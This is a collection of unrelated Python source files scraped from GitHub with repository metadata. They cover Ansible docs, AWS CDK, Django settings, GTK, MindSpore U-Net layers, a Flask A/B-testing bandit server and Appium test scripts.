0e25538b2f24f1bc002b19a61391017c17667d3d
|
/xsharepoint/win_xspmanagedpath.py
|
527691433ba4407838d8a7cd0c78122a6cfd4090
|
[] |
no_license
|
trondhindenes/Ansible-Auto-Generated-Modules
|
725fae6ba9b0eef00c9fdc21179e2500dfd6725f
|
efa6ac8cd2b545116f24c1929936eb8cc5c8d337
|
refs/heads/master
| 2020-04-06T09:21:00.756651
| 2016-10-07T07:08:29
| 2016-10-07T07:08:29
| 36,883,816
| 12
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,584
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# <COPYRIGHT>
# <CODEGENMETA>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
DOCUMENTATION = '''
---
module: win_xspmanagedpath
version_added:
short_description: Generated from DSC module xsharepoint version 0.12.0.0 at 07.10.2016 02.56.36
description:
- This DSC module is used to deploy and configure SharePoint Server 2013, and convers a wide range of areas including web apps, service apps and farm configuration.
options:
Explicit:
description:
-
required: True
default:
aliases: []
HostHeader:
description:
-
required: True
default:
aliases: []
RelativeUrl:
description:
-
required: True
default:
aliases: []
WebAppUrl:
description:
-
required: True
default:
aliases: []
InstallAccount_username:
description:
-
required: False
default:
aliases: []
InstallAccount_password:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_username:
description:
-
required: False
default:
aliases: []
PsDscRunAsCredential_password:
description:
-
required: False
default:
aliases: []
AutoInstallModule:
description:
- If true, the required dsc resource/module will be auto-installed using the Powershell package manager
required: False
default: false
aliases: []
choices:
- true
- false
AutoConfigureLcm:
description:
- If true, LCM will be auto-configured for directly invoking DSC resources (which is a one-time requirement for Ansible DSC modules)
required: False
default: false
aliases: []
choices:
- true
- false
|
[
"trond@hindenes.com"
] |
trond@hindenes.com
|
d454ee79742bbf7b555240e05ae0700d83559c75
|
29fad6273eb43fcbaff7460b2b68fea66d9ebc8c
|
/custom-vpc/custom_vpc/custom_vpc_stack.py
|
99ef9dd2bd53bf2c57edf14bd1ebc1b98829cff7
|
[] |
no_license
|
satishbr/cdk-demos
|
a3b2c7ca32551eb1c0264f8125f2ffc9413d00ff
|
14568c885322f561d548de0d1175f3b60ee87df0
|
refs/heads/master
| 2022-11-10T16:58:38.105403
| 2020-04-15T10:20:19
| 2020-04-15T10:20:19
| 275,331,921
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,025
|
py
|
from aws_cdk import (
aws_ec2 as ec2,
core
)
class CustomVpcStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
# The code that defines your stack goes here
# https://docs.aws.amazon.com/cdk/api/latest/python/aws_cdk.aws_ec2/Vpc.html
vpc = ec2.Vpc(
self, "MyVpc",
cidr="10.13.0.0/21",
max_azs=2,
nat_gateways=0,
subnet_configuration=[
ec2.SubnetConfiguration(name="public", cidr_mask=24, subnet_type=ec2.SubnetType.PUBLIC),
# ec2.SubnetConfiguration(name="private", cidr_mask=24, subnet_type=ec2.SubnetType.PRIVATE)
ec2.SubnetConfiguration(name="private", cidr_mask=24, subnet_type=ec2.SubnetType.ISOLATED)
]
)
# Tag all VPC Resources
core.Tag.add(vpc,key="Owner",value="KonStone",include_resource_types=[])
|
[
"13oct08@quantumfoam.uni.cc"
] |
13oct08@quantumfoam.uni.cc
|
258c7e7730f7dcfc58404705362466c414aa2af4
|
8b865eca2facf190369df4303fd6550c31614f72
|
/project04/bagInterface.py
|
49ca757766fdb7a64aa4d786bbe30b5e0f3d4fe9
|
[] |
no_license
|
Yamase31/cs112
|
16ba1732441e70065f2aded7542907ccb35e048e
|
199c5731b0bcbd475d8a8d2c9429eaebfbc1d180
|
refs/heads/main
| 2023-06-30T13:34:43.086674
| 2021-08-10T03:14:45
| 2021-08-10T03:14:45
| 394,503,671
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,340
|
py
|
"""
Author: James Lawson, Harry Pinkerton, Laurie Jones
File: baginterface.py
Speficitactions of the methods for all bag classes. Running this code will
not produce any results, but it shows the headers and docstrings of the methods
that MUST be included or supported in any bag class.
"""
class BagInterface(object):
"""Interface for all bag types."""
# Constructor
def __init__(self, sourceCollection = None):
"""Sets the initial state of self, which includes the
contents of sourceCollection, if it's present."""
self._size = 0
self._modCount = 0
if sourceCollection:
for item in sourceCollection:
self.add(item)
#pass
# Accessor methods
def isEmpty(self):
"""Returns True if len(self) == 0, or False otherwise."""
if len(self) == 0:
return True
else:
return False
def count(self, target):
"""Returns the number of a specific items in self."""
""" Returns the number of instances of item in self"""
itemCount = 0
for nextItem in self:
if nextItem == target:
itemCount += 1
return itemCount
def __len__(self):
"""-Returns the number of items in self."""
return self._size
def __str__(self):
"""Returns the string representation of self."""
return "{" + ",".join(map(str, self)) + "}"
def __iter__(self):
"""Supports iteration over a view of self."""
return None
def __add__(self, other):
"""Returns a new bag containing the contents
of self and other."""
result = ArrayBag(self)
for item in other:
result.add(item)
return result
def __eq__(self, other):
"""Returns True if self equals other,
or False otherwise."""
return False
# Mutator methods
def clear(self):
"""Makes self become empty."""
pass
def add(self, item):
"""Adds item to self."""
self._items = Node(item, self._items)
self._size += 1
pass
def remove(self, item):
"""Precondition: item is in self.
Raises: KeyError if item in not in self.
Postcondition: item is removed from self."""
pass
|
[
"noreply@github.com"
] |
Yamase31.noreply@github.com
|
0681e4919822450a149df6a9ebf09f9bd101b37f
|
2d837bca6989f61996e4e8e96635d722c97241c3
|
/core/gtk_table.py
|
eaae443c2d7d162408c56f74d7190bb125d20de0
|
[] |
no_license
|
gsy/gmusic
|
1485e11f4d63241f012b9e2ee27bbdb1ef563ce5
|
277e70c83a0ffcc00f2fc93933668dc16add11a8
|
refs/heads/master
| 2020-03-26T20:48:54.145376
| 2013-05-03T07:28:37
| 2013-05-03T07:28:37
| 9,724,424
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,189
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8
import pygtk
pygtk.require('2.0')
import gtk
class albumViewer:
def __init__(self):
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.connect("destroy", lambda w:gtk.main_quit())
self.table = gtk.Table(1, 2, False)
self.table.set_row_spacings(10)
self.table.set_col_spacings(10)
image1 = gtk.Image()
image1.set_from_file("1.jpg")
self.table.attach(image1, 0, 1, 0, 1, gtk.FILL|gtk.EXPAND, gtk.FILL|gtk.EXPAND, 10, 10)
self.scaleImage(image1, "1.jpg")
image2 = gtk.Image()
image2.set_from_file("2.jpg")
self.table.attach(image2, 0, 1, 1, 2, gtk.FILL|gtk.EXPAND, gtk.FILL|gtk.EXPAND, 10, 10)
self.scaleImage(image2, "2.jpg")
self.window.add(self.table)
self.window.show_all()
def scaleImage(self, image, file):
pixbuf = gtk.gdk.pixbuf_new_from_file(file)
scaled_buf = pixbuf.scale_simple(200, 200, gtk.gdk.INTERP_BILINEAR)
image.set_from_pixbuf(scaled_buf)
def main(self):
gtk.main()
if __name__ == '__main__':
albumViewer().main()
|
[
"gtcxg@hotmail.com"
] |
gtcxg@hotmail.com
|
2407745c75d7ca85e8683e02f858075f868b447a
|
9b639327ffb1ee18e88904bc2e158d55205acc0b
|
/plot_multifreq_lic.py
|
cc2727d74c10908c58cfef293ca806223c30a714
|
[] |
no_license
|
guanyilun/gc_plots
|
6aebfef07013a2d7feb3975a7b76cf3dfc5fbd22
|
f4c1c68a3364fe77f949c6121c38448374314c9e
|
refs/heads/master
| 2023-06-25T06:04:17.530867
| 2021-07-19T21:55:17
| 2021-07-19T21:55:17
| 339,585,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,746
|
py
|
"""This script produces LIC plot based on multifrequency temperature
plot
"""
import argparse, os, os.path as op
import numpy as np
import matplotlib.pyplot as plt
from pixell import enmap, enplot, utils as u
from matplotlib import colors
from common import *
import lib
import plotstyle
# parser defined in common
parser.add_argument("-T", default=None)
parser.add_argument("-P", default=None)
parser.add_argument("--axis", action='store_true')
parser.add_argument("--figsize", default="(8,4)")
parser.add_argument("--texture", help='file to store texture', default='mf_texture.npy')
parser.add_argument('--force', action='store_true')
args = parser.parse_args()
if not op.exists(args.odir): os.makedirs(args.odir)
if args.figsize: figsize=eval(args.figsize)
else: figsize=None
# define box of interests
box = boxes[args.area]
# load a map for wcs only
imap = load_map(filedb['f090']['coadd'], box=box, fcode='f090')
# load two maps
tmap = np.load(args.T)
# start plotting
popts = {
'origin': 'lower',
}
# plots:
fig, ax = plt.subplots(1, 1, figsize=figsize, subplot_kw={'projection':imap.wcs})
if not args.axis:
ax.axis('off')
plt.tight_layout(h_pad=0.5)
else:
ax.tick_params(axis='x', colors='white', which='both', labelcolor='black')
ax.tick_params(axis='y', colors='white', which='both', labelcolor='black')
ax.set_aspect('equal')
for side in ['left','right','top','bottom']:
ax.spines[side].set_visible(True)
ax.spines[side].set_color('white')
plotstyle.setup_axis(ax, nticks=[10,5])
ax.set_ylabel("$b$")
ax.set_xlabel('$l$')
plt.tight_layout(h_pad=0.1)
# polarization angle plot
# reload imap to get the original resolution
# seed = enmap.rand_gauss(imap[0].shape, imap.wcs)
# seed = enmap.smooth_gauss(seed, 0.5*u.arcmin*u.fwhm)
seed = None
imap = enmap.smooth_gauss(imap, 5*u.arcmin*u.fwhm)
P = np.sum(imap[1:]**2,axis=0)**0.5
if not op.exists(args.texture) or args.force:
theta = lib.Bangle(imap[1], imap[2], toIAU=True)
# no need to add for LIC pi/2
texture = lib.LIC_texture(theta, length=0.1, seed=seed, contrast=True)
np.save(args.texture, texture)
else:
texture = np.load(args.texture)
# boost contrast
curve = lambda x: 1/(1+np.exp(-(x-0.5)))
# texture = curve(texture) # option to adjust contrast of lic texture
alpha = np.min([np.ones_like(texture), 1.2*(P/P.max())**0.7],axis=0)
textures = np.stack([np.ones_like(texture)*alpha]*3+[0.6*texture], axis=2)
ax.imshow(tmap, **popts)
ax.imshow(textures, origin='lower')
# watermark
ax.text(0.84, 0.05, "ACT Collaboration", fontsize=10, color='gray', transform=ax.transAxes, alpha=0.8)
ofile = op.join(args.odir, args.oname)
print("Writing:", ofile)
plt.savefig(ofile, bbox_inches='tight')
|
[
"zoom.aaron@gmail.com"
] |
zoom.aaron@gmail.com
|
6a61f6445c74967d9422d6b4739e394a79e11568
|
6eae4a2f7326238820bca29f9a2d99fb054f91e4
|
/src/blog/settings.py
|
5348a0f815fe878e1bf8eb108d2fa5a1e15a2eb0
|
[
"MIT"
] |
permissive
|
jach58/api-blog
|
88e69f80378be4ecfc110aa54363556eb3053c78
|
5e668289856669537f2d6dc7236ec4f1e566e765
|
refs/heads/master
| 2021-04-03T09:47:39.386947
| 2018-03-11T04:58:56
| 2018-03-11T04:58:56
| 124,724,713
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,473
|
py
|
"""
Django settings for blog project.
Generated by 'django-admin startproject' using Django 1.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# BASE_DIR = "/Users/jmitch/desktop/blog/src/"
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'sm@g)(fbwdh5wc*xe@j++m9rh^uza5se9a57c5ptwkg*b@ki0x'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# third party
'crispy_forms',
'markdown_deux',
'pagedown',
'rest_framework',
# local apps
'comments',
'posts',
]
CRISPY_TEMPLATE_PACK = 'bootstrap3'
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
LOGIN_URL = "/login/"
ROOT_URLCONF = 'blog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'blog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
#'/var/www/static/',
]
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn")
MEDIA_URL = "/media/"
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "media_cdn")
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
# 'DEFAULT_PARSER_CLASSES': (
# 'rest_framework.parsers.JSONParser',
# )
'DEFAULT_AUTHENTICATION_CLASSES':(
# 'rest_framework.authentication.SessionAuthentication',
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
# 'rest_framework.authentication.BasicAuthentication'
),
'DEFAULT_PERMISSION_CLASSES':(
'rest_framework.permissions.IsAuthenticated',
# 'rest_framework.permissions.IsAuthenticatedOrReadOnly',
)
}
"""
$ curl -X POST -d "username=square&password=square1234" http://localhost:8000/api/auth/token/
"""
| ["jach58@hotmail.com"] | jach58@hotmail.com |

7d3b0358b02431cb03dbd79b5b445f66d3ffe27c | 8e6e70f3c6e5aed96960a6de8983e72eafae1862 | /wheelcms_valve/tests/conftest.py | 5591a16354335efcbb43f8c77d1a730b58f56e24 | [] | no_license | wheelcms/wheelcms_valve | c7988c2fe89f85e978272ed319e7057553dd24e9 | 8ea19cb8eb0081857b120c0f9bf55c128ee5d471 | refs/heads/master | 2021-01-19T08:01:43.063297 | 2015-04-04T18:28:20 | 2015-04-04T18:28:20 | 9,416,780 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py |
from twotest.fixtures import client, django_client
from wheelcms_axle.tests.fixtures import root, localtyperegistry, localtemplateregistry
|
[
"github@in.m3r.nl"
] |
github@in.m3r.nl
|
7a1a17f7d564853eb7d0e2b10e90489f14279b8a
|
0c4b33d04cf7fb73b3752b03af89eeaf76b8a0d2
|
/第14章-网络编程/1.py
|
699170cf14d9fa720ccd1731412ecb2f52e1ece3
|
[] |
no_license
|
kingflyfly/python_study
|
3b3ab427d23174b61b8f14c223059cfa9f303219
|
8a63a7c11b408bbc11a2b636517beaa424b37725
|
refs/heads/master
| 2020-06-11T01:39:52.655730
| 2020-03-24T16:09:39
| 2020-03-24T16:09:39
| 193,817,757
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
a,b = {"yanzhe1":"yanzhe","shanshan":"shanshan1"}.items()
print(type(a))
if a == "yanzhe1":
print("ok")
else:print("fial")
print(a)
print(b)
|
[
"542001608@qq.com"
] |
542001608@qq.com
|
ecb1c8c9b5ecc3253e822b5e31639049244ed39d
|
0ad7476f82d662249d13527219c45916cc6fb063
|
/bayesian_AB/client_server_practice/server_starter.py
|
3687225b896a5015fb7e697403d26b5ee12a7524
|
[] |
no_license
|
duilee/ab_testing
|
87d40edb0836cd78bf0e75f41947510c3f598316
|
d4bb900da4cf84cd28e5fcb8d37a2b6481eb94d8
|
refs/heads/master
| 2023-07-19T04:46:32.052780
| 2023-07-06T11:30:12
| 2023-07-06T11:30:12
| 331,349,413
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,830
|
py
|
# From the course: Bayesin Machine Learning in Python: A/B Testing
# https://deeplearningcourses.com/c/bayesian-machine-learning-in-python-ab-testing
# https://www.udemy.com/bayesian-machine-learning-in-python-ab-testing
from __future__ import print_function, division
from builtins import range
# Note: you may need to update your version of future
# sudo pip install -U future
import numpy as np
from flask import Flask, jsonify, request
from scipy.stats import beta
# create an app
app = Flask(__name__)
# define bandits
# there's no "pull arm" here
# since that's technically now the user/client
class Bandit:
def __init__(self, name):
self.name = name
self.clks = 0
self.views = 0
def sample(self):
a = 1 + self.clks
b = 1 + self.views - self.clks
return np.random.beta(a, b)
def add_clicks(self):
self.clks += 1
def add_view(self):
self.views += 1
if self.views % 50 == 0:
print("%s: clks=%s, views=%s" % (self.name, self.clks, self.views))
# TODO - what else does the Bandit need to do?
# initialize bandits
banditA = Bandit('A')
banditB = Bandit('B')
@app.route('/get_ad')
def get_ad():
sampleA = banditA.sample()
sampleB = banditB.sample()
if sampleA > sampleB:
ad = 'A'
banditA.add_view()
return jsonify({'advertisement_id': ad})
else:
ad = 'B'
banditB.add_view()
return jsonify({'advertisement_id': ad})
@app.route('/click_ad', methods=['POST'])
def click_ad():
result = 'OK'
if request.form['advertisement_id'] == 'A':
# TODO
banditA.add_clicks()
elif request.form['advertisement_id'] == 'B':
# TODO
banditB.add_clicks()
else:
result = 'Invalid Input.'
# nothing to return really
return jsonify({'result': result})
if __name__ == '__main__':
app.run(host='127.0.0.1', port='8888')
|
[
"duilee@berkeley.edu"
] |
duilee@berkeley.edu
|
83bd32474d5fdd7943df61a2f550898f0e745c32
|
5b9035dbfe0750e9933728f9631ad7a183dd3429
|
/17/00/weakref.ref.callback.py
|
1e2d84ae969b05e9575767bcd18a17d0192a8745
|
[
"CC0-1.0"
] |
permissive
|
pylangstudy/201709
|
271efbd4f337d912d0ca958a621eb2a040091528
|
53d868786d7327a83bfa7f4149549c6f9855a6c6
|
refs/heads/master
| 2021-01-21T12:16:21.950493
| 2017-09-30T00:02:34
| 2017-09-30T00:02:34
| 102,058,300
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 609
|
py
|
import weakref
class ExpensiveObject(object):
def __del__(self): print('Deleting ... %s' % self)
def callback(reference): print('callback(', reference, ')')
obj = ExpensiveObject()
r = weakref.ref(obj, callback)
print('obj:', obj) # <__main__.ExpensiveObject object at 0xb710adac>
print('ref:', r) # <weakref at 0xb70cb414; to 'ExpensiveObject' at 0xb710adac>
print('r():', r()) # <__main__.ExpensiveObject object at 0xb710adac>
del obj
print('Deleted obj !')
print('r():', r()) #None
print('ref:', r) #<weakref at 0xb70cb414; dead>
print('obj:', obj) #NameError: name 'obj' is not defined
|
[
"pylangstudy@yahoo.co.jp"
] |
pylangstudy@yahoo.co.jp
|
447309d3a7c5cd11e434e9eebbca587f1745d7b5
|
04f5b7913f5802813ed5b9b894d9723a96893d29
|
/xonsh2/prompt/__init__.py
|
a6524670600a5456eef8be8b014b0213eefb254b
|
[
"BSD-2-Clause"
] |
permissive
|
anki-code/xonsh2
|
b0e52f01119622b383b37a27658c3615507ef6e7
|
bd96fcdce9319ab6b90c7d9ac47d2249b61144d0
|
refs/heads/master
| 2023-01-04T09:19:43.857637
| 2020-11-01T17:10:44
| 2020-11-01T17:10:44
| 309,102,477
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 857
|
py
|
# amalgamate exclude
import os as _os
if _os.getenv("XONSH_DEBUG", ""):
pass
else:
import sys as _sys
try:
from xonsh2.prompt import __amalgam__
cwd = __amalgam__
_sys.modules["xonsh2.prompt.cwd"] = __amalgam__
env = __amalgam__
_sys.modules["xonsh2.prompt.env"] = __amalgam__
gitstatus = __amalgam__
_sys.modules["xonsh2.prompt.gitstatus"] = __amalgam__
job = __amalgam__
_sys.modules["xonsh2.prompt.job"] = __amalgam__
times = __amalgam__
_sys.modules["xonsh2.prompt.times"] = __amalgam__
vc = __amalgam__
_sys.modules["xonsh2.prompt.vc"] = __amalgam__
base = __amalgam__
_sys.modules["xonsh2.prompt.base"] = __amalgam__
del __amalgam__
except ImportError:
pass
del _sys
del _os
# amalgamate end
|
[
"a"
] |
a
|
938319c0ec9bf23932b135e6b736177504f56448
|
444a9480bce2035565332d4d4654244c0b5cd47b
|
/research/cv/LearningToSeeInTheDark/src/unet_parts.py
|
98222051e28a37247b798b96c9df9180649f7d6c
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
mindspore-ai/models
|
7ede9c6454e77e995e674628204e1c6e76bd7b27
|
eab643f51336dbf7d711f02d27e6516e5affee59
|
refs/heads/master
| 2023-07-20T01:49:34.614616
| 2023-07-17T11:43:18
| 2023-07-17T11:43:18
| 417,393,380
| 301
| 92
|
Apache-2.0
| 2023-05-17T11:22:28
| 2021-10-15T06:38:37
|
Python
|
UTF-8
|
Python
| false
| false
| 3,576
|
py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Unet Components"""
import mindspore.nn as nn
import mindspore.ops.operations as F
from mindspore.ops import Maximum
from mindspore.ops import DepthToSpace as dts
from mindspore.common.initializer import TruncatedNormal
from mindspore.common.initializer import XavierUniform
import mindspore as ms
ms.set_seed(1212)
class LRelu(nn.Cell):
""" activation function """
def __init__(self):
super(LRelu, self).__init__()
self.max = Maximum()
def construct(self, x):
""" construct of lrelu activation """
return self.max(x * 0.2, x)
class DoubleConv(nn.Cell):
"""conv2d for two times with lrelu activation"""
def __init__(self, in_channels, out_channels, mid_channels=None):
super(DoubleConv, self).__init__()
if not mid_channels:
mid_channels = out_channels
self.kernel_init = XavierUniform()
self.double_conv = nn.SequentialCell(
[nn.Conv2d(in_channels, mid_channels, kernel_size=3, stride=1, pad_mode="same",
weight_init=self.kernel_init), LRelu(),
nn.Conv2d(mid_channels, out_channels, kernel_size=3, stride=1, pad_mode="same",
weight_init=self.kernel_init), LRelu()])
def construct(self, x):
""" construct of double conv2d """
return self.double_conv(x)
class Down(nn.Cell):
"""Downscaling with maxpool then double conv"""
def __init__(self, in_channels, out_channels):
super(Down, self).__init__()
self.maxpool_conv = nn.SequentialCell(
[nn.MaxPool2d(kernel_size=2, stride=2, pad_mode="same"),
DoubleConv(in_channels, out_channels)]
)
def construct(self, x):
""" construct of down cell """
return self.maxpool_conv(x)
class Up(nn.Cell):
"""Upscaling then double conv"""
def __init__(self, in_channels, out_channels):
super(Up, self).__init__()
self.concat = F.Concat(axis=1)
self.kernel_init = TruncatedNormal(0.02)
self.conv = DoubleConv(in_channels, out_channels)
self.up = nn.Conv2dTranspose(in_channels, in_channels // 2, kernel_size=2, stride=2,
pad_mode='same', weight_init=self.kernel_init)
def construct(self, x1, x2):
""" construct of up cell """
x1 = self.up(x1)
x = self.concat((x1, x2))
return self.conv(x)
class OutConv(nn.Cell):
"""trans data into RGB channels"""
def __init__(self, in_channels, out_channels):
super(OutConv, self).__init__()
self.kernel_init = XavierUniform()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=1, pad_mode='same', weight_init=self.kernel_init)
self.DtS = dts(block_size=2)
def construct(self, x):
""" construct of last conv """
x = self.conv(x)
x = self.DtS(x)
return x
|
[
"chenhaozhe1@huawei.com"
] |
chenhaozhe1@huawei.com
|
4d5abe700c5d48838af29b5be52a1e7aa59eee03
|
ba5c4c07d11e6f529ba7184ef3fe1ab0d61a19e6
|
/examples/btn_start.py
|
6b1c2aec64fb2f2ea08c9cf654e1fd702b12c056
|
[] |
no_license
|
slightlynybbled/tkmats
|
920033adef46f41b67e99f3e7ba1b13a1c7ff4c5
|
73e03e519287b09436f547a532fbd33c1ce05cca
|
refs/heads/master
| 2020-04-30T17:58:19.036996
| 2020-02-19T03:44:33
| 2020-02-19T03:44:33
| 176,996,416
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,287
|
py
|
import logging
from random import random, choice
from time import sleep
import tkinter as tk
from mats import Test
from mats import TestSequence
from tkmats import TkMatsFrame
# The CommunicationTest class shows the minimum test structure that might
# be reasonably be implemented. Only the `execute()` method is implemented.
class CommunicationTest(Test):
def __init__(self, loglevel=logging.INFO):
super().__init__(moniker='communications test',
pass_if=True,
loglevel=loglevel)
# overriding the execute method
def execute(self, is_passing):
        # a normal test would set `test_is_passing` based on real conditions; we
        # are using a random value here simply for illustrative purposes
passing = choice([True] * 3 + [False])
# should return a (key, value) which are the results of the test
return passing
# The PumpFlowTest implements the `setup` and `teardown` methods as well
# in order to demonstrate what that may look like
class PumpFlowTest(Test):
def __init__(self, loglevel=logging.INFO):
super().__init__(moniker='pump flow test',
min_value=5.6, max_value=6.4,
loglevel=loglevel)
def setup(self, is_passing):
# setting the speed of the pump might be something done in the setup,
# including the wait time to speed up the pump, which we will
# simulate with a 2s sleep
sleep(2.0)
def execute(self, is_passing):
# simulate long-running process, such as
# several flow measurement/averaging cycles
sleep(0.1)
flow = 5.5 + random()
# should return a (key, value) tuple which are the results of the test
return flow
def teardown(self, is_passing):
# again, simulating another long-running process...
sleep(0.1)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
# create the sequence of test objects
sequence = [CommunicationTest(), PumpFlowTest()]
ts = TestSequence(sequence=sequence, auto_run=False, loglevel=logging.DEBUG)
window = tk.Tk()
tkate_frame = TkMatsFrame(window, ts, vertical=True)
tkate_frame.grid()
window.mainloop()
|
[
"slightlynybbled@gmail.com"
] |
slightlynybbled@gmail.com
|
ab061fb9bc9e9a17133655c37bf8f7f9b529bc18
|
076dd40fcb9283a8e3d66dd3fa3745826b887378
|
/kashgari/embeddings/__init__.py
|
066291c4f5f8347689c72990be315e70c02a4db2
|
[
"MIT"
] |
permissive
|
gongqingyi-github/Kashgari
|
54bb53bb618b9791433a61a7fd5e73f4951873f1
|
efc9510ed53f5bb78183e66d96d57a55cc290a91
|
refs/heads/master
| 2020-04-18T16:51:22.609685
| 2019-01-26T02:26:54
| 2019-01-26T02:26:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
py
|
# encoding: utf-8
"""
@author: BrikerMan
@contact: eliyar917@gmail.com
@blog: https://eliyar.biz
@version: 1.0
@license: Apache Licence
@file: __init__.py.py
@time: 2019-01-19 09:57
"""
from .embeddings import BERTEmbedding
from .embeddings import BaseEmbedding
from .embeddings import CustomEmbedding
from .embeddings import WordEmbeddings
from .embeddings import get_embedding_by_conf
if __name__ == "__main__":
print("Hello world")
|
[
"eliyar917@gmail.com"
] |
eliyar917@gmail.com
|
98b29e78f354f896f27d9785a107e5bae46cb53a
|
8f70ad12af7eba07efa52eb29b8f99ed3900dbb9
|
/AGTGA data/AGTGA/posifon/posifon 2/TestSuite/TestSuite/TestCase01.py
|
038064c093137ade8a3097f9ca295bbb0ed13f50
|
[] |
no_license
|
Georgesarkis/AGTGARowData
|
768952dc03dc342bcbe0902bf2fb1720853d0e14
|
e1faa7dc820b051a73b0844eac545e597a97da16
|
refs/heads/master
| 2022-10-01T17:06:04.758751
| 2020-06-05T07:25:41
| 2020-06-05T07:25:41
| 267,772,437
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,717
|
py
|
import time
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from TestSuite.TestSuiteHelper import ElementFinder
port = 'http://localhost:4723/wd/hub'
driver = webdriver.Remote(command_executor=port, desired_capabilities={'automationName' : 'UiAutomator2','deviceName': 'Moto G (5)','platformName': 'Android', 'app': 'C:/Users/ze0396/Desktop/AGTGA/APKS/posifon.apk' , 'autoGrantPermissions' : 'true', 'appWaitActivity' : '*.*','fullreset' : 'false','noReset' : 'true' } )
time.sleep(2)
time.sleep(2)
el = ElementFinder(driver, 312,633)
el.click()
el.send_keys('demo4@konto.se')
time.sleep(2)
